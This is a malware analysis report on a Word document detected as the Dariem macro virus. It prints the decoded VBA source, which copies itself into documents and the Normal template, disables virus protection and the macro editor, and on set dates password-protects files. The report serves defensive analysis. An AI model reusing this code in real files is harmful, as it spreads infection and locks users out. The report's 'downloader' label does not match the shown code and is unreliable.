Office (OLE) malware analysis — malicious · 135bc81887dc1abe

MALICIOUS

Office (OLE)

34.5 KB Created: 2009-08-22 11:21:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 48dac06dd2b775a013cd0b52acf2ab7d SHA-1: e713281419db6aafecedd3d6e082e0444422b97e SHA-256: 135bc81887dc1abe46144204325290a04da57831c744c8c63c22bcd37efc859e

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro. The ClamAV detection 'Doc.Trojan.Dariem-1' strongly indicates malicious intent. The VBA script, while partially truncated, contains comments suggesting a personal message but also includes code that modifies document properties and potentially executes further actions, typical of a macro-based downloader.

Heuristics 3

ClamAV: Doc.Trojan.Dariem-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Dariem-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6239 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6239 bytes
SHA-256: `c569f05e17593739c20cbd3b40b4300ddd4f448654ab333896f643371eb034b1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Para mi querido hijo: 'Dariem Alexander 'de su papá +i+o :-(> ' ¦ ' V Dim T As Boolean Dim E_xiste As Boolean Dim A_miDocumento As Object Dim M_iPlantilla As Object Dim O_codigo As String ' \| ' V ' —> Rosemary ' ' Date: 11/02/2000 Const MENSAJE = "Dariem" & vbTab & "03 de Febrero de 1995" & vbTab & "R.C.A. - Chinita" Private Sub Document_Close() On Error Resume Next Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1) Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1) If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then With Dialogs(wdDialogToolsOptionsSave): .Password = "Dariem": .Execute: End With With Dialogs(wdDialogFileSummaryInfo): .Title = "Viva el Perú Carajo" .Subject = "Fueron advertidos, el Perú rumbo al desarrollo" .Author = "+orreBlA¦\¦CA": .Keywords = "The Best": .Comments = "For two people to who I love: Dariem and...." & Chr(82) _ & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend": .Execute: End With T = ActiveDocument.Saved Else With Dialogs(wdDialogFileSummaryInfo): .Title = "" .Subject = "Cuidado, tengan mucho cuidado" .Author = "+orreBlA¦\¦CA": .Keywords = "The Best": .Comments = "For two people to who I love: Dariem and...." & Chr(82) _ & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend": .Execute: End With T = ActiveDocument.Saved End If O_codigo = A_miDocumento.CodeModule.Lines(1, A_miDocumento.CodeModule.CountOfLines) If O_codigo = "" Then O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines) A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines A_miDocumento.CodeModule.AddFromString O_codigo A_miDocumento.Save Else If InStr(1, O_codigo, "Dariem", 0) = 0 Then A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines A_miDocumento.CodeModule.AddFromString O_codigo A_miDocumento.Save End If End If A_miDocumento.Save CustomizationContext = NormalTemplate FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable Set myMenuBar = CommandBars.ActiveMenuBar Set newMenu = myMenuBar.Controls.Item(6).Controls.Item(13) newMenu.Enabled = False NormalTemplate.Save End Sub Private Sub Document_New() On Error Resume Next Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1) Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1) With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With With Dialogs(wdDialogFileSummaryInfo): .Title = "" .Subject = "Cuidado, tengan mucho cuidado" .Author = "+orreBlA¦\¦CA": .Keywords = "The Best": .Comments = "For two people to who I love: Dariem and...." & Chr(82) _ & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend": .Execute: End With O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines) A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines A_miDocumento.CodeModule.AddFromString O_codigo NormalTemplate.Save If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then With ActiveDocument.Sections(1) .Footers(wdHeaderFooterPrimary).Range.Text = MENSAJE End With Set myMenuBar = CommandBars.ActiveMenuBar Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(8) newMenu.Enabled = False Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(9) ... (truncated)

SHA-256: c569f05e17593739c20cbd3b40b4300ddd4f448654ab333896f643371eb034b1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


'Para mi querido hijo:
'Dariem Alexander
'de su papá +i+o :-(>
'   ¦
'   V
Dim T As Boolean
Dim E_xiste As Boolean

Dim A_miDocumento As Object
Dim M_iPlantilla As Object
Dim O_codigo As String
'   |
'   V
'    —> Rosemary
'
'   Date: 11/02/2000
Const MENSAJE = "Dariem" & vbTab & "03 de Febrero de 1995" & vbTab & "R.C.A. - Chinita"

Private Sub Document_Close()
On Error Resume Next
Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1)
Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1)

If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then
    With Dialogs(wdDialogToolsOptionsSave): .Password = "Dariem": .Execute: End With
    With Dialogs(wdDialogFileSummaryInfo):
        .Title = "Viva el Perú Carajo"
        .Subject = "Fueron advertidos, el Perú rumbo al desarrollo"
        .Author = "+orreBlA¦\¦CA":
        .Keywords = "The Best":
        .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
        & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
        .Execute:
    End With
    T = ActiveDocument.Saved
Else
    With Dialogs(wdDialogFileSummaryInfo):
        .Title = ""
        .Subject = "Cuidado, tengan mucho cuidado"
        .Author = "+orreBlA¦\¦CA":
        .Keywords = "The Best":
        .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
        & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
        .Execute:
    End With
    T = ActiveDocument.Saved
End If

O_codigo = A_miDocumento.CodeModule.Lines(1, A_miDocumento.CodeModule.CountOfLines)
If O_codigo = "" Then
    O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines)
    A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
    A_miDocumento.CodeModule.AddFromString O_codigo
    A_miDocumento.Save
Else
    If InStr(1, O_codigo, "Dariem", 0) = 0 Then
        A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
        A_miDocumento.CodeModule.AddFromString O_codigo
        A_miDocumento.Save
    End If
End If
A_miDocumento.Save

CustomizationContext = NormalTemplate
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable

Set myMenuBar = CommandBars.ActiveMenuBar
Set newMenu = myMenuBar.Controls.Item(6).Controls.Item(13)
newMenu.Enabled = False

NormalTemplate.Save

End Sub

Private Sub Document_New()
On Error Resume Next
Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1)
Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1)
With Options:
    .ConfirmConversions = 0:
    .VirusProtection = 0:
    .SaveNormalPrompt = 0:
End With
With Dialogs(wdDialogFileSummaryInfo):
    .Title = ""
    .Subject = "Cuidado, tengan mucho cuidado"
    .Author = "+orreBlA¦\¦CA":
    .Keywords = "The Best":
    .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
    & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
    .Execute:
End With
O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines)
A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
A_miDocumento.CodeModule.AddFromString O_codigo
NormalTemplate.Save

If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then
    With ActiveDocument.Sections(1)
        .Footers(wdHeaderFooterPrimary).Range.Text = MENSAJE
    End With
    Set myMenuBar = CommandBars.ActiveMenuBar
    Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(8)
    newMenu.Enabled = False
    Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(9)
 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.